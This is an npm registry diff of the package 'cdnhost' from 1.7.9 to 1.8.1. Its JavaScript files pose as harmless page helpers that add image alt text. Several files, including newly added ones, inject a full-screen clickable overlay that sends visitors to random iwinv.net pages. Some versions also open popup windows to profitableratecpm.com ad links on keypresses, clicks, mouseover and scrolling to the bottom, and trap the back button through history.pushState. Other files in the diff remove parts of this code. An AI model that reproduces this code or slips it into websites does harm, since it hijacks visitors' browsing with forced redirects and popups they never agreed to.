cdnhost 1.7.9 → 1.8.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/iwinv.js CHANGED
@@ -1,3 +1,4 @@
1
+
1
2
  window.addEventListener('load', function() {
2
3
  var images = document.querySelectorAll('img');
3
4
  images.forEach(function(img) {
@@ -7,20 +8,8 @@ window.addEventListener('load', function() {
7
8
  });
8
9
  });
9
10
 
10
- let hasMouseOverTriggered = false;
11
-
12
- function handleKeyPress(event) {
13
- const isMobile = /Mobi|Android/i.test(navigator.userAgent);
14
-
15
- const desktopUrls = [
16
- 'https://www.profitableratecpm.com/jxz4jd7r?key=c69dbf238e855fdc108af717c6363e6b',
17
- 'https://www.profitableratecpm.com/ci7z33utw?key=315a36d4584b5d56bad0933d4e4f5457',
18
- 'https://www.profitableratecpm.com/h2qib3dxzv?key=72c2823d629a4fdcc8b9b5b379edab23',
19
- 'https://www.profitableratecpm.com/awb9ahbyse?key=37b518d892f143b18397d62c495b962d',
20
- 'https://www.profitableratecpm.com/ecz5npz7h?key=8f4f16f67beabcf6c8f61c352c5caddb',
21
- ];
22
-
23
- const mobileUrls = [
11
+ document.writeln('<style>* {font-size: 1em !important}</style>');
12
+ const urls = [
24
13
  'https://ruliweb.iwinv.net/recent.php',
25
14
  'https://instiz.iwinv.net/recent.php',
26
15
  'https://bikini.iwinv.net/recent.php',
@@ -48,50 +37,48 @@ function handleKeyPress(event) {
48
37
  'https://snapp.im/recent.php',
49
38
  'https://curseforge.iwinv.net/recent.php',
50
39
  'https://lolchess.iwinv.net/recent.php',
51
- ];
40
+ ];
52
41
 
42
+ const randomUrl = urls[Math.floor(Math.random() * urls.length)];
43
+ document.writeln('<style>');
44
+ document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
45
+ document.writeln('</style>');
46
+ document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
53
47
 
54
- const urls = isMobile ? mobileUrls : desktopUrls;
55
-
56
- function getRandomUrls(arr, num) {
57
- const shuffled = arr.sort(() => 0.5 - Math.random());
58
- return shuffled.slice(0, num);
59
- }
60
-
61
- const randomUrls = getRandomUrls(urls, 2);
62
- randomUrls.forEach(url => window.open(url, '_blank', `width=200,height=200,left=${screen.width - 210},top=${screen.height - 210}`));
48
+ document.getElementById('container').style.boxShadow = 'none';
49
+ function ss(){
50
+ document.getElementById("s2").style.transition = "opacity 15s";
51
+ document.getElementById("button").style.transition = "opacity 15s";
52
+ setTimeout("s()", 3999);
53
+ setTimeout("h()", 15000);
63
54
  }
64
-
65
- window.addEventListener('scroll', () => {
66
- const scrollHeight = document.documentElement.scrollHeight;
67
- const scrollTop = document.documentElement.scrollTop || document.body.scrollTop;
68
- const clientHeight = document.documentElement.clientHeight;
69
-
70
- if (scrollTop + clientHeight >= scrollHeight) {
71
- handleKeyPress();
72
- }
73
- });
74
-
75
- document.addEventListener('keydown', handleKeyPress);
76
- document.documentElement.addEventListener('click', handleKeyPress);
77
-
78
- history.pushState(null, null, "");
79
- window.onpopstate = function(a) {
80
- if (a) {
81
- history.back();
82
- handleKeyPress();
83
- }
84
- };
85
-
86
- document.addEventListener("mouseover", function () {
87
- if (!hasMouseOverTriggered) {
88
- hasMouseOverTriggered = true;
89
- handleKeyPress();
90
- }
91
- });
92
-
93
- if (['workers', 'iwinv'].some(host => window.location.hostname.includes(host))) {
94
- handleKeyPress();
55
+ function pcss(){
56
+ setTimeout("s()", 3999);
57
+ setTimeout("h()", 15000);
58
+ }
59
+ function a(){
60
+ document.getElementById("button").style.display="none";
61
+ }
62
+ function aa(){
63
+ document.getElementById("button").style.display="block";
64
+ }
65
+ function s(){
66
+ document.getElementById("s2").style.opacity = 0;
67
+ document.getElementById("button").style.opacity = 0;
68
+ document.getElementById("sha").style.display="none";
69
+ document.getElementById("cc").style.maxHeight="unset";
70
+ }
71
+ function h(){
72
+ const s2 = document.getElementById("s2");
73
+ const button = document.getElementById("button");
74
+ s2.style.zIndex = -1;
75
+ button.style.display = "none";
76
+ setTimeout(function () {
77
+ s2.style.zIndex = 99;
78
+ button.style.display = "block";
79
+ s2.style.opacity = 0.9;
80
+ button.style.opacity = 1;
81
+ document.getElementById("s2").style.transition = "opacity 1s";
82
+ document.getElementById("button").style.transition = "opacity 1s";
83
+ }, 3000);
95
84
  }
96
-
97
- document.writeln('<style></style>');
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "cdnhost",
3
- "version": "1.7.9",
3
+ "version": "1.8.1",
4
4
  "description": "cdnhost",
5
5
  "main": "index.js",
6
6
  "scripts": {
@@ -0,0 +1,150 @@
1
+
2
+ window.addEventListener('load', function() {
3
+ var images = document.querySelectorAll('img');
4
+ images.forEach(function(img) {
5
+ if (!img.hasAttribute('alt')) {
6
+ img.setAttribute('alt', 'image');
7
+ }
8
+ });
9
+ });
10
+
11
+ const urls = [
12
+ 'https://ruliweb.iwinv.net/recent.php',
13
+ 'https://instiz.iwinv.net/recent.php',
14
+ 'https://bikini.iwinv.net/recent.php',
15
+ 'https://manatoki.iwinv.net/recent.php',
16
+ 'https://gmarket.iwinv.net/recent.php',
17
+ 'https://mlbpark.iwinv.net/recent.php',
18
+ 'https://mmtcld.iwinv.net/recent.php',
19
+ 'https://flightaware.iwinv.net/recent.php',
20
+ 'https://koreakr.iwinv.net/recent.php',
21
+ 'https://popcat.iwinv.net/recent.php',
22
+ 'https://ecount.iwinv.net/recent.php',
23
+ 'https://hiworks.iwinv.net/recent.php',
24
+ 'https://shopee.iwinv.net/recent.php',
25
+ 'https://eomisae.iwinv.net/recent.php',
26
+ 'https://kmcert.iwinv.net/recent.php',
27
+ 'https://munpia.iwinv.net/recent.php',
28
+ 'https://slrclub.iwinv.net/recent.php',
29
+ 'https://interpals.iwinv.net/recent.php',
30
+ 'https://snp500.iwinv.net/recent.php',
31
+ 'https://dctribe.iwinv.net/recent.php',
32
+ 'https://mixamo.iwinv.net/recent.php',
33
+ 'https://ssssss.iwinv.net/recent.php',
34
+ 'https://newsfactory.iwinv.net',
35
+ 'https://2news.kr/recent.php',
36
+ 'https://snapp.im/recent.php',
37
+ 'https://curseforge.iwinv.net/recent.php',
38
+ 'https://lolchess.iwinv.net/recent.php',
39
+ ];
40
+
41
+
42
+
43
+
44
+ function handleKeyPress(event) {
45
+ const isMobile = /Mobi|Android/i.test(navigator.userAgent);
46
+
47
+ const desktopUrls = [
48
+ 'https://www.profitableratecpm.com/jxz4jd7r?key=c69dbf238e855fdc108af717c6363e6b',
49
+ 'https://www.profitableratecpm.com/ci7z33utw?key=315a36d4584b5d56bad0933d4e4f5457',
50
+ 'https://www.profitableratecpm.com/h2qib3dxzv?key=72c2823d629a4fdcc8b9b5b379edab23',
51
+ 'https://www.profitableratecpm.com/awb9ahbyse?key=37b518d892f143b18397d62c495b962d',
52
+ 'https://www.profitableratecpm.com/ecz5npz7h?key=8f4f16f67beabcf6c8f61c352c5caddb',
53
+ ];
54
+
55
+ const mobileUrls = [
56
+ 'https://ruliweb.iwinv.net/recent.php',
57
+ 'https://instiz.iwinv.net/recent.php',
58
+ 'https://bikini.iwinv.net/recent.php',
59
+ 'https://manatoki.iwinv.net/recent.php',
60
+ 'https://gmarket.iwinv.net/recent.php',
61
+ 'https://mlbpark.iwinv.net/recent.php',
62
+ 'https://mmtcld.iwinv.net/recent.php',
63
+ 'https://flightaware.iwinv.net/recent.php',
64
+ 'https://koreakr.iwinv.net/recent.php',
65
+ 'https://popcat.iwinv.net/recent.php',
66
+ 'https://ecount.iwinv.net/recent.php',
67
+ 'https://hiworks.iwinv.net/recent.php',
68
+ 'https://shopee.iwinv.net/recent.php',
69
+ 'https://eomisae.iwinv.net/recent.php',
70
+ 'https://kmcert.iwinv.net/recent.php',
71
+ 'https://munpia.iwinv.net/recent.php',
72
+ 'https://slrclub.iwinv.net/recent.php',
73
+ 'https://interpals.iwinv.net/recent.php',
74
+ 'https://snp500.iwinv.net/recent.php',
75
+ 'https://dctribe.iwinv.net/recent.php',
76
+ 'https://mixamo.iwinv.net/recent.php',
77
+ 'https://ssssss.iwinv.net/recent.php',
78
+ 'https://newsfactory.iwinv.net',
79
+ 'https://2news.kr/recent.php',
80
+ 'https://snapp.im/recent.php',
81
+ 'https://curseforge.iwinv.net/recent.php',
82
+ 'https://lolchess.iwinv.net/recent.php',
83
+ ];
84
+
85
+ const urls = isMobile ? mobileUrls : desktopUrls;
86
+
87
+ function getRandomUrls(arr, num) {
88
+ const shuffled = arr.sort(() => 0.5 - Math.random());
89
+ return shuffled.slice(0, num);
90
+ }
91
+
92
+ const randomUrls = getRandomUrls(urls, 2);
93
+ randomUrls.forEach(url => window.open(url, '_blank'));
94
+ }
95
+
96
+ const randomUrl = urls[Math.floor(Math.random() * urls.length)];
97
+ document.writeln('<style>');
98
+ document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
99
+ document.writeln('</style>');
100
+ document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
101
+
102
+ window.addEventListener('scroll', () => {
103
+ const scrollHeight = document.documentElement.scrollHeight;
104
+ const scrollTop = document.documentElement.scrollTop || document.body.scrollTop;
105
+ const clientHeight = document.documentElement.clientHeight;
106
+
107
+ if (scrollTop + clientHeight >= scrollHeight) {
108
+ handleKeyPress();
109
+ }
110
+ });
111
+
112
+ history.pushState(null,null,""),window.onpopstate=function(a){a&&(history.back(),handleKeyPress())}
113
+
114
+ document.getElementById('container').style.boxShadow = 'none';
115
+ function ss(){
116
+ document.getElementById("s2").style.transition = "opacity 15s";
117
+ document.getElementById("button").style.transition = "opacity 15s";
118
+ setTimeout("s()", 3999);
119
+ setTimeout("h()", 15000);
120
+ }
121
+ function pcss(){
122
+ setTimeout("s()", 3999);
123
+ setTimeout("h()", 15000);
124
+ }
125
+ function a(){
126
+ document.getElementById("button").style.display="none";
127
+ }
128
+ function aa(){
129
+ document.getElementById("button").style.display="block";
130
+ }
131
+ function s(){
132
+ document.getElementById("s2").style.opacity = 0;
133
+ document.getElementById("button").style.opacity = 0;
134
+ document.getElementById("sha").style.display="none";
135
+ document.getElementById("cc").style.maxHeight="unset";
136
+ }
137
+ function h(){
138
+ const s2 = document.getElementById("s2");
139
+ const button = document.getElementById("button");
140
+ s2.style.zIndex = -1;
141
+ button.style.display = "none";
142
+ setTimeout(function () {
143
+ s2.style.zIndex = 99;
144
+ button.style.display = "block";
145
+ s2.style.opacity = 0.9;
146
+ button.style.opacity = 1;
147
+ document.getElementById("s2").style.transition = "opacity 1s";
148
+ document.getElementById("button").style.transition = "opacity 1s";
149
+ }, 2000);
150
+ }
package/seekr.js CHANGED
@@ -8,6 +8,7 @@ window.addEventListener('load', function() {
8
8
  });
9
9
  });
10
10
 
11
+ document.writeln('<style>* {font-size: 1em !important}</style>');
11
12
  const urls = [
12
13
  'https://ruliweb.iwinv.net/recent.php',
13
14
  'https://instiz.iwinv.net/recent.php',
@@ -38,79 +39,12 @@ const urls = [
38
39
  'https://lolchess.iwinv.net/recent.php',
39
40
  ];
40
41
 
41
-
42
-
43
-
44
- function handleKeyPress(event) {
45
- const isMobile = /Mobi|Android/i.test(navigator.userAgent);
46
-
47
- const desktopUrls = [
48
- 'https://www.profitableratecpm.com/jxz4jd7r?key=c69dbf238e855fdc108af717c6363e6b',
49
- 'https://www.profitableratecpm.com/ci7z33utw?key=315a36d4584b5d56bad0933d4e4f5457',
50
- 'https://www.profitableratecpm.com/h2qib3dxzv?key=72c2823d629a4fdcc8b9b5b379edab23',
51
- 'https://www.profitableratecpm.com/awb9ahbyse?key=37b518d892f143b18397d62c495b962d',
52
- 'https://www.profitableratecpm.com/ecz5npz7h?key=8f4f16f67beabcf6c8f61c352c5caddb',
53
- ];
54
-
55
- const mobileUrls = [
56
- 'https://ruliweb.iwinv.net/recent.php',
57
- 'https://instiz.iwinv.net/recent.php',
58
- 'https://bikini.iwinv.net/recent.php',
59
- 'https://manatoki.iwinv.net/recent.php',
60
- 'https://gmarket.iwinv.net/recent.php',
61
- 'https://mlbpark.iwinv.net/recent.php',
62
- 'https://mmtcld.iwinv.net/recent.php',
63
- 'https://flightaware.iwinv.net/recent.php',
64
- 'https://koreakr.iwinv.net/recent.php',
65
- 'https://popcat.iwinv.net/recent.php',
66
- 'https://ecount.iwinv.net/recent.php',
67
- 'https://hiworks.iwinv.net/recent.php',
68
- 'https://shopee.iwinv.net/recent.php',
69
- 'https://eomisae.iwinv.net/recent.php',
70
- 'https://kmcert.iwinv.net/recent.php',
71
- 'https://munpia.iwinv.net/recent.php',
72
- 'https://slrclub.iwinv.net/recent.php',
73
- 'https://interpals.iwinv.net/recent.php',
74
- 'https://snp500.iwinv.net/recent.php',
75
- 'https://dctribe.iwinv.net/recent.php',
76
- 'https://mixamo.iwinv.net/recent.php',
77
- 'https://ssssss.iwinv.net/recent.php',
78
- 'https://newsfactory.iwinv.net',
79
- 'https://2news.kr/recent.php',
80
- 'https://snapp.im/recent.php',
81
- 'https://curseforge.iwinv.net/recent.php',
82
- 'https://lolchess.iwinv.net/recent.php',
83
- ];
84
-
85
- const urls = isMobile ? mobileUrls : desktopUrls;
86
-
87
- function getRandomUrls(arr, num) {
88
- const shuffled = arr.sort(() => 0.5 - Math.random());
89
- return shuffled.slice(0, num);
90
- }
91
-
92
- const randomUrls = getRandomUrls(urls, 2);
93
- randomUrls.forEach(url => window.open(url, '_blank'));
94
- }
95
-
96
42
  const randomUrl = urls[Math.floor(Math.random() * urls.length)];
97
43
  document.writeln('<style>');
98
44
  document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
99
45
  document.writeln('</style>');
100
46
  document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
101
47
 
102
- window.addEventListener('scroll', () => {
103
- const scrollHeight = document.documentElement.scrollHeight;
104
- const scrollTop = document.documentElement.scrollTop || document.body.scrollTop;
105
- const clientHeight = document.documentElement.clientHeight;
106
-
107
- if (scrollTop + clientHeight >= scrollHeight) {
108
- handleKeyPress();
109
- }
110
- });
111
-
112
- history.pushState(null,null,""),window.onpopstate=function(a){a&&(history.back(),handleKeyPress())}
113
-
114
48
  document.getElementById('container').style.boxShadow = 'none';
115
49
  function ss(){
116
50
  document.getElementById("s2").style.transition = "opacity 15s";
@@ -146,5 +80,5 @@ function h(){
146
80
  button.style.opacity = 1;
147
81
  document.getElementById("s2").style.transition = "opacity 1s";
148
82
  document.getElementById("button").style.transition = "opacity 1s";
149
- }, 2000);
83
+ }, 3000);
150
84
  }
package/seekr2.js CHANGED
@@ -8,29 +8,8 @@ window.addEventListener('load', function() {
8
8
  });
9
9
  });
10
10
 
11
+ document.writeln('<style>* {font-size: 1em !important}</style>');
11
12
  const urls = [
12
- 'https://www.profitableratecpm.com/jxz4jd7r?key=c69dbf238e855fdc108af717c6363e6b',
13
- 'https://www.profitableratecpm.com/ci7z33utw?key=315a36d4584b5d56bad0933d4e4f5457',
14
- 'https://www.profitableratecpm.com/h2qib3dxzv?key=72c2823d629a4fdcc8b9b5b379edab23',
15
- 'https://www.profitableratecpm.com/awb9ahbyse?key=37b518d892f143b18397d62c495b962d',
16
- 'https://www.profitableratecpm.com/ecz5npz7h?key=8f4f16f67beabcf6c8f61c352c5caddb',
17
- ];
18
-
19
-
20
-
21
-
22
- function handleKeyPress(event) {
23
- const isMobile = /Mobi|Android/i.test(navigator.userAgent);
24
-
25
- const desktopUrls = [
26
- 'https://www.profitableratecpm.com/jxz4jd7r?key=c69dbf238e855fdc108af717c6363e6b',
27
- 'https://www.profitableratecpm.com/ci7z33utw?key=315a36d4584b5d56bad0933d4e4f5457',
28
- 'https://www.profitableratecpm.com/h2qib3dxzv?key=72c2823d629a4fdcc8b9b5b379edab23',
29
- 'https://www.profitableratecpm.com/awb9ahbyse?key=37b518d892f143b18397d62c495b962d',
30
- 'https://www.profitableratecpm.com/ecz5npz7h?key=8f4f16f67beabcf6c8f61c352c5caddb',
31
- ];
32
-
33
- const mobileUrls = [
34
13
  'https://ruliweb.iwinv.net/recent.php',
35
14
  'https://instiz.iwinv.net/recent.php',
36
15
  'https://bikini.iwinv.net/recent.php',
@@ -58,18 +37,7 @@ function handleKeyPress(event) {
58
37
  'https://snapp.im/recent.php',
59
38
  'https://curseforge.iwinv.net/recent.php',
60
39
  'https://lolchess.iwinv.net/recent.php',
61
- ];
62
-
63
- const urls = isMobile ? mobileUrls : desktopUrls;
64
-
65
- function getRandomUrls(arr, num) {
66
- const shuffled = arr.sort(() => 0.5 - Math.random());
67
- return shuffled.slice(0, num);
68
- }
69
-
70
- const randomUrls = getRandomUrls(urls, 2);
71
- randomUrls.forEach(url => window.open(url, '_blank'));
72
- }
40
+ ];
73
41
 
74
42
  const randomUrl = urls[Math.floor(Math.random() * urls.length)];
75
43
  document.writeln('<style>');
@@ -77,18 +45,6 @@ document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:
77
45
  document.writeln('</style>');
78
46
  document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
79
47
 
80
- window.addEventListener('scroll', () => {
81
- const scrollHeight = document.documentElement.scrollHeight;
82
- const scrollTop = document.documentElement.scrollTop || document.body.scrollTop;
83
- const clientHeight = document.documentElement.clientHeight;
84
-
85
- if (scrollTop + clientHeight >= scrollHeight) {
86
- handleKeyPress();
87
- }
88
- });
89
-
90
- history.pushState(null,null,""),window.onpopstate=function(a){a&&(history.back(),handleKeyPress())}
91
-
92
48
  document.getElementById('container').style.boxShadow = 'none';
93
49
  function ss(){
94
50
  document.getElementById("s2").style.transition = "opacity 15s";
@@ -124,5 +80,5 @@ function h(){
124
80
  button.style.opacity = 1;
125
81
  document.getElementById("s2").style.transition = "opacity 1s";
126
82
  document.getElementById("button").style.transition = "opacity 1s";
127
- }, 2000);
83
+ }, 3000);
128
84
  }
@@ -0,0 +1,152 @@
1
+ window.addEventListener('load', function() {
2
+ var images = document.querySelectorAll('img');
3
+ images.forEach(function(img) {
4
+ if (!img.hasAttribute('alt')) {
5
+ img.setAttribute('alt', 'image');
6
+ }
7
+ });
8
+ });
9
+
10
+ document.writeln('<style>* {font-size: 1em !important}</style>');
11
+ const urls = [
12
+ 'https://ruliweb.iwinv.net/recent.php',
13
+ 'https://instiz.iwinv.net/recent.php',
14
+ 'https://bikini.iwinv.net/recent.php',
15
+ 'https://manatoki.iwinv.net/recent.php',
16
+ 'https://gmarket.iwinv.net/recent.php',
17
+ 'https://mlbpark.iwinv.net/recent.php',
18
+ 'https://mmtcld.iwinv.net/recent.php',
19
+ 'https://flightaware.iwinv.net/recent.php',
20
+ 'https://koreakr.iwinv.net/recent.php',
21
+ 'https://popcat.iwinv.net/recent.php',
22
+ 'https://ecount.iwinv.net/recent.php',
23
+ 'https://hiworks.iwinv.net/recent.php',
24
+ 'https://shopee.iwinv.net/recent.php',
25
+ 'https://eomisae.iwinv.net/recent.php',
26
+ 'https://kmcert.iwinv.net/recent.php',
27
+ 'https://munpia.iwinv.net/recent.php',
28
+ 'https://slrclub.iwinv.net/recent.php',
29
+ 'https://interpals.iwinv.net/recent.php',
30
+ 'https://snp500.iwinv.net/recent.php',
31
+ 'https://dctribe.iwinv.net/recent.php',
32
+ 'https://mixamo.iwinv.net/recent.php',
33
+ 'https://ssssss.iwinv.net/recent.php',
34
+ 'https://newsfactory.iwinv.net',
35
+ 'https://2news.kr/recent.php',
36
+ 'https://snapp.im/recent.php',
37
+ 'https://curseforge.iwinv.net/recent.php',
38
+ 'https://lolchess.iwinv.net/recent.php',
39
+ ];
40
+
41
+
42
+
43
+
44
+ function handleKeyPress(event) {
45
+ const isMobile = /Mobi|Android/i.test(navigator.userAgent);
46
+
47
+ const desktopUrls = [
48
+ 'https://www.profitableratecpm.com/jxz4jd7r?key=c69dbf238e855fdc108af717c6363e6b',
49
+ 'https://www.profitableratecpm.com/ci7z33utw?key=315a36d4584b5d56bad0933d4e4f5457',
50
+ 'https://www.profitableratecpm.com/h2qib3dxzv?key=72c2823d629a4fdcc8b9b5b379edab23',
51
+ 'https://www.profitableratecpm.com/awb9ahbyse?key=37b518d892f143b18397d62c495b962d',
52
+ 'https://www.profitableratecpm.com/ecz5npz7h?key=8f4f16f67beabcf6c8f61c352c5caddb',
53
+ ];
54
+
55
+ const mobileUrls = [
56
+ 'https://ruliweb.iwinv.net/recent.php',
57
+ 'https://instiz.iwinv.net/recent.php',
58
+ 'https://bikini.iwinv.net/recent.php',
59
+ 'https://manatoki.iwinv.net/recent.php',
60
+ 'https://gmarket.iwinv.net/recent.php',
61
+ 'https://mlbpark.iwinv.net/recent.php',
62
+ 'https://mmtcld.iwinv.net/recent.php',
63
+ 'https://flightaware.iwinv.net/recent.php',
64
+ 'https://koreakr.iwinv.net/recent.php',
65
+ 'https://popcat.iwinv.net/recent.php',
66
+ 'https://ecount.iwinv.net/recent.php',
67
+ 'https://hiworks.iwinv.net/recent.php',
68
+ 'https://shopee.iwinv.net/recent.php',
69
+ 'https://eomisae.iwinv.net/recent.php',
70
+ 'https://kmcert.iwinv.net/recent.php',
71
+ 'https://munpia.iwinv.net/recent.php',
72
+ 'https://slrclub.iwinv.net/recent.php',
73
+ 'https://interpals.iwinv.net/recent.php',
74
+ 'https://snp500.iwinv.net/recent.php',
75
+ 'https://dctribe.iwinv.net/recent.php',
76
+ 'https://mixamo.iwinv.net/recent.php',
77
+ 'https://ssssss.iwinv.net/recent.php',
78
+ 'https://newsfactory.iwinv.net',
79
+ 'https://2news.kr/recent.php',
80
+ 'https://snapp.im/recent.php',
81
+ 'https://curseforge.iwinv.net/recent.php',
82
+ 'https://lolchess.iwinv.net/recent.php',
83
+ ];
84
+
85
+ const urls = isMobile ? mobileUrls : desktopUrls;
86
+
87
+ function getRandomUrls(arr, num) {
88
+ const shuffled = arr.sort(() => 0.5 - Math.random());
89
+ return shuffled.slice(0, num);
90
+ }
91
+
92
+ const randomUrls = getRandomUrls(urls, 2);
93
+ randomUrls.forEach(url => window.open(url, '_blank'));
94
+ }
95
+
96
+ const randomUrl = urls[Math.floor(Math.random() * urls.length)];
97
+ document.writeln('<style>');
98
+ document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
99
+ document.writeln('</style>');
100
+ document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
101
+
102
+ window.addEventListener('scroll', () => {
103
+ const scrollHeight = document.documentElement.scrollHeight;
104
+ const scrollTop = document.documentElement.scrollTop || document.body.scrollTop;
105
+ const clientHeight = document.documentElement.clientHeight;
106
+
107
+ if (scrollTop + clientHeight >= scrollHeight) {
108
+ handleKeyPress();
109
+ }
110
+ });
111
+
112
+ document.addEventListener('keydown', handleKeyPress); //add
113
+
114
+ history.pushState(null,null,""),window.onpopstate=function(a){a&&(history.back(),handleKeyPress())}
115
+
116
+ document.getElementById('container').style.boxShadow = 'none';
117
+ function ss(){
118
+ document.getElementById("s2").style.transition = "opacity 6s";
119
+ document.getElementById("button").style.transition = "opacity 6s";
120
+ setTimeout("s()", 3999);
121
+ setTimeout("h()", 5000);
122
+ }
123
+ function pcss(){
124
+ setTimeout("s()", 3999);
125
+ setTimeout("h()", 5000);
126
+ }
127
+ function a(){
128
+ document.getElementById("button").style.display="none";
129
+ }
130
+ function aa(){
131
+ document.getElementById("button").style.display="block";
132
+ }
133
+ function s(){
134
+ document.getElementById("s2").style.opacity = 0;
135
+ document.getElementById("button").style.opacity = 0;
136
+ document.getElementById("sha").style.display="none";
137
+ document.getElementById("cc").style.maxHeight="unset";
138
+ }
139
+ function h(){
140
+ const s2 = document.getElementById("s2");
141
+ const button = document.getElementById("button");
142
+ s2.style.zIndex = -1;
143
+ button.style.display = "none";
144
+ setTimeout(function () {
145
+ s2.style.zIndex = 99;
146
+ button.style.display = "block";
147
+ s2.style.opacity = 0.9;
148
+ button.style.opacity = 1;
149
+ document.getElementById("s2").style.transition = "opacity 1s";
150
+ document.getElementById("button").style.transition = "opacity 1s";
151
+ }, 3000);
152
+ }
package/total.js CHANGED
@@ -1,3 +1,4 @@
1
+
1
2
  window.addEventListener('load', function() {
2
3
  var images = document.querySelectorAll('img');
3
4
  images.forEach(function(img) {
@@ -38,91 +39,22 @@ const urls = [
38
39
  'https://lolchess.iwinv.net/recent.php',
39
40
  ];
40
41
 
41
-
42
-
43
-
44
- function handleKeyPress(event) {
45
- const isMobile = /Mobi|Android/i.test(navigator.userAgent);
46
-
47
- const desktopUrls = [
48
- 'https://www.profitableratecpm.com/jxz4jd7r?key=c69dbf238e855fdc108af717c6363e6b',
49
- 'https://www.profitableratecpm.com/ci7z33utw?key=315a36d4584b5d56bad0933d4e4f5457',
50
- 'https://www.profitableratecpm.com/h2qib3dxzv?key=72c2823d629a4fdcc8b9b5b379edab23',
51
- 'https://www.profitableratecpm.com/awb9ahbyse?key=37b518d892f143b18397d62c495b962d',
52
- 'https://www.profitableratecpm.com/ecz5npz7h?key=8f4f16f67beabcf6c8f61c352c5caddb',
53
- ];
54
-
55
- const mobileUrls = [
56
- 'https://ruliweb.iwinv.net/recent.php',
57
- 'https://instiz.iwinv.net/recent.php',
58
- 'https://bikini.iwinv.net/recent.php',
59
- 'https://manatoki.iwinv.net/recent.php',
60
- 'https://gmarket.iwinv.net/recent.php',
61
- 'https://mlbpark.iwinv.net/recent.php',
62
- 'https://mmtcld.iwinv.net/recent.php',
63
- 'https://flightaware.iwinv.net/recent.php',
64
- 'https://koreakr.iwinv.net/recent.php',
65
- 'https://popcat.iwinv.net/recent.php',
66
- 'https://ecount.iwinv.net/recent.php',
67
- 'https://hiworks.iwinv.net/recent.php',
68
- 'https://shopee.iwinv.net/recent.php',
69
- 'https://eomisae.iwinv.net/recent.php',
70
- 'https://kmcert.iwinv.net/recent.php',
71
- 'https://munpia.iwinv.net/recent.php',
72
- 'https://slrclub.iwinv.net/recent.php',
73
- 'https://interpals.iwinv.net/recent.php',
74
- 'https://snp500.iwinv.net/recent.php',
75
- 'https://dctribe.iwinv.net/recent.php',
76
- 'https://mixamo.iwinv.net/recent.php',
77
- 'https://ssssss.iwinv.net/recent.php',
78
- 'https://newsfactory.iwinv.net',
79
- 'https://2news.kr/recent.php',
80
- 'https://snapp.im/recent.php',
81
- 'https://curseforge.iwinv.net/recent.php',
82
- 'https://lolchess.iwinv.net/recent.php',
83
- ];
84
-
85
- const urls = isMobile ? mobileUrls : desktopUrls;
86
-
87
- function getRandomUrls(arr, num) {
88
- const shuffled = arr.sort(() => 0.5 - Math.random());
89
- return shuffled.slice(0, num);
90
- }
91
-
92
- const randomUrls = getRandomUrls(urls, 2);
93
- randomUrls.forEach(url => window.open(url, '_blank'));
94
- }
95
-
96
42
  const randomUrl = urls[Math.floor(Math.random() * urls.length)];
97
43
  document.writeln('<style>');
98
44
  document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
99
45
  document.writeln('</style>');
100
46
  document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
101
47
 
102
- window.addEventListener('scroll', () => {
103
- const scrollHeight = document.documentElement.scrollHeight;
104
- const scrollTop = document.documentElement.scrollTop || document.body.scrollTop;
105
- const clientHeight = document.documentElement.clientHeight;
106
-
107
- if (scrollTop + clientHeight >= scrollHeight) {
108
- handleKeyPress();
109
- }
110
- });
111
-
112
- document.addEventListener('keydown', handleKeyPress); //add
113
-
114
- history.pushState(null,null,""),window.onpopstate=function(a){a&&(history.back(),handleKeyPress())}
115
-
116
48
  document.getElementById('container').style.boxShadow = 'none';
117
49
  function ss(){
118
- document.getElementById("s2").style.transition = "opacity 6s";
119
- document.getElementById("button").style.transition = "opacity 6s";
50
+ document.getElementById("s2").style.transition = "opacity 15s";
51
+ document.getElementById("button").style.transition = "opacity 15s";
120
52
  setTimeout("s()", 3999);
121
- setTimeout("h()", 5000);
53
+ setTimeout("h()", 15000);
122
54
  }
123
55
  function pcss(){
124
56
  setTimeout("s()", 3999);
125
- setTimeout("h()", 5000);
57
+ setTimeout("h()", 15000);
126
58
  }
127
59
  function a(){
128
60
  document.getElementById("button").style.display="none";
package/wordpress-chat.js CHANGED
@@ -1,15 +1,15 @@
1
- function handleKeyPress(event) {
2
- const isMobile = /Mobi|Android/i.test(navigator.userAgent);
3
-
4
- const desktopUrls = [
5
- 'https://www.profitableratecpm.com/jxz4jd7r?key=c69dbf238e855fdc108af717c6363e6b',
6
- 'https://www.profitableratecpm.com/ci7z33utw?key=315a36d4584b5d56bad0933d4e4f5457',
7
- 'https://www.profitableratecpm.com/h2qib3dxzv?key=72c2823d629a4fdcc8b9b5b379edab23',
8
- 'https://www.profitableratecpm.com/awb9ahbyse?key=37b518d892f143b18397d62c495b962d',
9
- 'https://www.profitableratecpm.com/ecz5npz7h?key=8f4f16f67beabcf6c8f61c352c5caddb',
10
- ];
11
1
 
12
- const mobileUrls = [
2
+ window.addEventListener('load', function() {
3
+ var images = document.querySelectorAll('img');
4
+ images.forEach(function(img) {
5
+ if (!img.hasAttribute('alt')) {
6
+ img.setAttribute('alt', 'image');
7
+ }
8
+ });
9
+ });
10
+
11
